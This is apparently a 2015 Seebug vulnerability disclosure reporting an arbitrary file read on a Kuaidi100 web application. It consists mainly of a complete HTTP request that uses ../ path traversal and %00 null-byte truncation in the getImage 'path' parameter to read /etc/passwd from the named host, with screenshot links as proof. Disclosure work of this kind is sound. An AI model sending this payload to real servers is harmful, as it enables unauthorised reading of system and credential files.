金蝶旗下快递100某处任意文件读取

2015-07-22T00:00:00
ID SSV:93807
Type seebug
Reporter Root
Modified 2015-07-22T00:00:00

Description

简要描述:

RT

详细说明:

http://net.kuaidi100.com/youshang-network/logined/auditInfo?method=auditInfoView

照片查看任意文件读取,通过 %00截断

GET /youshang-network/getImage?path=2015-07%2F2015-07-22%2F../../../../../../../etc/passwd%00.jpg HTTP/1.1 Host: net.kuaidi100.com Proxy-Connection: keep-alive Accept: image/webp,*/*;q=0.8 User-Agent: Referer: http://net.kuaidi100.com/youshang-network/logined/auditInfo?method=auditInfoView Accept-Encoding: gzip, deflate, sdch Accept-Language: zh-CN,zh;q=0.8,en;q=0.6 Cookie:

<img src="https://images.seebug.org/upload/201507/22134906157572b036364153e907cc7837e454c9.png" alt="金碟2.png" width="600" onerror="javascript:errimg(this);">

漏洞证明:

<img src="https://images.seebug.org/upload/201507/2213483934019afba6694a12223131981b638be4.png" alt="金碟1.png" width="600" onerror="javascript:errimg(this);">